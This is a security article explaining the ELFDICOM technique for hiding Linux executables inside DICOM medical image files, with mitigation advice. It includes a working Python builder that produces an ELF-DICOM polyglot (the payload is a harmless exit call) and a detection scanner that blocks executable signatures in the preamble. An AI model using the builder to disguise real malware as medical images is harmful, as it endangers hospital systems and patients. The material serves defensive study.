
By
April 13, 2025

ELFDICOM: Demonstrating a PoC Malware Polyglot Targeting Linux-Based Medical Devices


A high-severity vulnerability in DICOM, the standard file format and protocol for medical imaging, remains exploitable years after it was first reported. It lets an attacker embed executable code in an otherwise legitimate medical image file. Earlier research showed the impact on Windows-based medical systems; Praetorian has now published a proof of concept named ELFDICOM that carries the same technique to Linux, which puts nearly every operating system used in healthcare today in scope.

Understanding DICOM

Digital Imaging and Communications in Medicine (DICOM) has been the dominant file format for medical imaging for over two decades and is central to radiology, cardiology and other imaging practices. It carries detailed patient and study information alongside the pixel data, supporting diagnosis, treatment planning and medical research.

A DICOM file has two main parts: the File Header and the Data Set. The File Header begins with a 128-byte Preamble, a reserved region with no defined structure; the standard does not interpret its contents, which makes the format extensible but also lets an attacker place another format's header there and build a polyglot. The Preamble is followed by the 4-byte Prefix "DICM", the magic bytes that identify the file as DICOM. The Data Set is a sequence of Data Elements, each a numeric tag followed by a length and a value (explicit-VR encodings also carry a value representation), which store metadata such as patient and study details as well as the image pixel data.

The Polyglot Concept

In computing, a polyglot is a file that is valid in more than one format and behaves differently depending on which interpreter processes it. A single file might, for example, be valid C, PHP and Bash at the same time, running as whichever one it is handed to on a Linux system.

PE-DICOM: A Dangerous Combination

The threat escalates when the DICOM preamble meets the polyglot technique. In 2019, researcher Markel Picado Ortiz demonstrated this with PEDICOM, a polyglot that places a Windows PE executable inside a DICOM file. Renamed with a ".exe" extension, the file executes on Windows while still opening as a legitimate DICOM image in a viewer.

Shebang-DICOM

Ortiz's research also covers a much simpler Linux variant that needs no compiled malware at all: a shebang line such as #!/bin/sh at the start of the preamble turns the file into a shell script, so a DICOM file can be run directly to fetch and launch a remote payload. Because the preamble is only 128 bytes, the embedded script stays tiny and this is essentially an online attack that depends on network access to pull the rest of the payload. It shows how connected DICOM devices can be attacked both online and, with a larger embedded payload, offline.

ELF-DICOM Execution

To lift that size limit and enable offline attacks, ELFDICOM merges an ELF executable with a DICOM file. ELF (Executable and Linkable Format) is the native Linux executable format and can carry an arbitrarily large payload, so the attacker gets a fully functional binary while the file remains a valid DICOM image. The process is: build the executable, insert it into the DICOM file so that the Linux loader still finds a valid ELF image, and set the executable bit. The resulting ELF-DICOM hybrid still opens as a medical image and also runs as an ordinary Linux program.
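The following Python is an added example written for this page, not Praetorian's ELFDICOM code, showing one way such a hybrid can be built from scratch. It relies on a property of the formats rather than on anything specific to Praetorian's tooling: an ELF64 header (64 bytes) plus one program header (56 bytes) occupy 120 bytes, so the loader's entire view of the file fits inside the 128-byte preamble, and the program header can point at machine code stored further down in a private DICOM data element. The executable side assumes x86-64 Linux and a load address of 0x400000; the payload is a bare exit(0) system call, and the UIDs, patient name and private tag are constructed for the example.

```python
import os
import struct

# Constructed payload: x86-64 Linux exit(0) -- mov eax,60 ; xor edi,edi ; syscall
EXIT0 = bytes.fromhex("b83c00000031ff0f05")
LOAD_ADDR = 0x400000                            # assumed load address for the single PT_LOAD segment
SC_CLASS = b"1.2.840.10008.5.1.4.1.1.7"         # Secondary Capture Image Storage SOP Class
INSTANCE = b"1.2.826.0.1.3680043.8.498.1"       # constructed SOP Instance UID

def dicom_element(group, elem, vr, value):
    """Encode one explicit-VR little-endian data element (DICOM PS3.5 section 7.1.2)."""
    vr = vr.encode()
    if len(value) % 2:                          # values must have even length
        value += b"\x00" if vr in (b"UI", b"OB") else b" "
    if vr in (b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"):
        return struct.pack("<HH2sHI", group, elem, vr, 0, len(value)) + value
    return struct.pack("<HH2sH", group, elem, vr, len(value)) + value

def build_elfdicom(code=EXIT0):
    """Return (file_bytes, code_offset): a Part 10 DICOM file whose preamble is an ELF64 header."""
    meta_body = (dicom_element(0x0002, 0x0001, "OB", b"\x00\x01")
                 + dicom_element(0x0002, 0x0002, "UI", SC_CLASS)
                 + dicom_element(0x0002, 0x0003, "UI", INSTANCE)
                 + dicom_element(0x0002, 0x0010, "UI", b"1.2.840.10008.1.2.1"))  # Explicit VR LE
    meta = dicom_element(0x0002, 0x0000, "UL", struct.pack("<I", len(meta_body))) + meta_body
    head = (dicom_element(0x0008, 0x0016, "UI", SC_CLASS)
            + dicom_element(0x0008, 0x0018, "UI", INSTANCE)
            + dicom_element(0x0010, 0x0010, "PN", b"POLYGLOT^TEST")
            + dicom_element(0x0009, 0x0010, "LO", b"ELFDICOM"))        # private creator
    # The machine code rides as the value of a private OB element (0009,1001); its file
    # offset is preamble(128) + "DICM"(4) + meta + head + the 12-byte OB element header.
    code_offset = 128 + 4 + len(meta) + len(head) + 12
    body = b"DICM" + meta + head + dicom_element(0x0009, 0x1001, "OB", code)
    total = 128 + len(body)
    ehdr = struct.pack("<4sBBBBB7xHHIQQQIHHHHHH",
                       b"\x7fELF", 2, 1, 1, 0, 0,       # ELF64, little-endian, v1, SYSV ABI
                       2, 0x3E, 1,                       # ET_EXEC, EM_X86_64, EV_CURRENT
                       LOAD_ADDR + code_offset,          # e_entry lands inside the OB value
                       64, 0, 0, 64, 56, 1, 0, 0, 0)     # phoff, shoff, flags, ehsize, phentsize, phnum, sh*
    # One PT_LOAD (R+X) mapping the whole file at LOAD_ADDR, so the DICOM bytes are mapped too.
    phdr = struct.pack("<IIQQQQQQ", 1, 5, 0, LOAD_ADDR, LOAD_ADDR, total, total, 0x1000)
    preamble = (ehdr + phdr).ljust(128, b"\x00")         # 120 bytes used, 8 bytes spare
    return preamble + body, code_offset

def elf_entry(data):
    """Read e_entry back out of the preamble (offset 24 of an ELF64 header)."""
    return struct.unpack_from("<Q", data, 24)[0]

if __name__ == "__main__":
    blob, off = build_elfdicom()
    with open("polyglot.dcm", "wb") as fh:
        fh.write(blob)
    os.chmod("polyglot.dcm", 0o755)                      # the executable bit the text mentions
    print(f"{len(blob)} bytes written, code at offset {off}, entry {elf_entry(blob):#x}")
```

On an x86-64 Linux host the written file runs as a program (./polyglot.dcm exits with status 0) while still starting, at offset 128, with a standard Part 10 "DICM" prefix and an explicit-VR File Meta group, which is exactly the dual nature the text describes. Keeping e_entry inside a data element's value rather than in the preamble is what frees the payload from the 128-byte limit.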

Mitigation Strategies

Because the DICOM standard permits arbitrary bytes in the first 128 bytes of a file, the polyglot cannot be eliminated by the format itself. It can, however, be detected and contained. One practical control is an allowlist for the preamble: accept only preambles that match known patterns (for example all zeros), block any that begin with a known executable signature such as ELF, PE or a shebang, and flag everything else for review. Checks like this belong where files enter the environment, such as PACS ingest and DICOM routers. Since the polyglot still has to be launched as a program, keeping the executable bit off files in image stores (or mounting those stores noexec) raises the bar further.
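As an added example (not from the page or Praetorian), here is such a preamble allowlist in Python, covering both the file layout described under "Understanding DICOM" and the mitigation above. It checks the "DICM" prefix at offset 128, walks the explicit-VR File Meta group to pull the transfer syntax, and classifies the preamble as allow, block or review. The signature tables and the three sample files are constructed for the example; a real deployment would fill the allowed-pattern table from the preambles its own modalities actually produce.

```python
import struct

# Signatures no medical image should carry in its preamble (constructed table for this example).
EXEC_MAGIC = {
    b"\x7fELF": "ELF executable (ELFDICOM)",
    b"MZ": "PE/DOS executable (PEDICOM)",
    b"#!": "shebang script (Shebang-DICOM)",
}
# Preamble patterns a site chooses to accept; DICOM PS3.10 names TIFF as the intended dual-format use.
ALLOWED_MAGIC = {
    b"II*\x00": "TIFF little-endian",
    b"MM\x00*": "TIFF big-endian",
}
LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"}  # VRs with a 4-byte length field

def classify_preamble(preamble):
    """Allowlist the 128-byte preamble: known-good passes, executable magic fails, the rest is flagged."""
    for magic, label in EXEC_MAGIC.items():
        if preamble.startswith(magic):
            return "block", label
    if preamble == b"\x00" * 128:
        return "allow", "all zeros"
    for magic, label in ALLOWED_MAGIC.items():
        if preamble.startswith(magic):
            return "allow", label
    return "review", "unrecognised preamble"

def parse_meta(data):
    """Walk the explicit-VR little-endian File Meta group (0002,xxxx) that follows 'DICM'."""
    if len(data) < 132 or data[128:132] != b"DICM":
        raise ValueError("not a DICOM Part 10 file: no DICM prefix at offset 128")
    pos, meta = 132, {}
    while pos + 8 <= len(data):
        group, elem, vr = struct.unpack_from("<HH2s", data, pos)
        if group != 0x0002:                      # end of the meta group
            break
        if vr in LONG_VRS:
            length = struct.unpack_from("<I", data, pos + 8)[0]
            pos += 12
        else:
            length = struct.unpack_from("<H", data, pos + 6)[0]
            pos += 8
        meta[(group, elem)] = data[pos:pos + length]
        pos += length
    return meta

def scan(data):
    """Return the allowlist verdict for one file plus its transfer syntax for logging."""
    verdict, reason = classify_preamble(data[:128])
    meta = parse_meta(data)
    ts = meta.get((0x0002, 0x0010), b"").rstrip(b"\x00").decode("ascii", "replace")
    return {"verdict": verdict, "reason": reason, "transfer_syntax": ts}

# Constructed samples: a clean file, an ELF polyglot and a shebang polyglot, each carrying a
# single (0002,0010) Transfer Syntax UID element (Explicit VR Little Endian) after the prefix.
META = b"\x02\x00\x10\x00UI\x14\x00" + b"1.2.840.10008.1.2.1\x00"
CLEAN = b"\x00" * 128 + b"DICM" + META
ELF_POLYGLOT = b"\x7fELF\x02\x01\x01" + b"\x00" * 121 + b"DICM" + META
SHEBANG = b"#!/bin/sh\n".ljust(128, b"\x00") + b"DICM" + META

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("elf", ELF_POLYGLOT), ("shebang", SHEBANG)):
        print(name, scan(blob))
```

The default verdict is "review" rather than "allow" on purpose: a blocklist of known executable signatures catches the published proof-of-concept variants, but because the preamble can hold anything, only the allowlist side keeps a new format's header from slipping through. Run the scan on every file at ingest and treat "block" as a reason to quarantine, not just to log.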

These findings underline the need for healthcare organisations to stay vigilant and push for stronger security controls around imaging systems. Continued work on safer alternatives will strengthen the security of the critical industries that depend on DICOM.
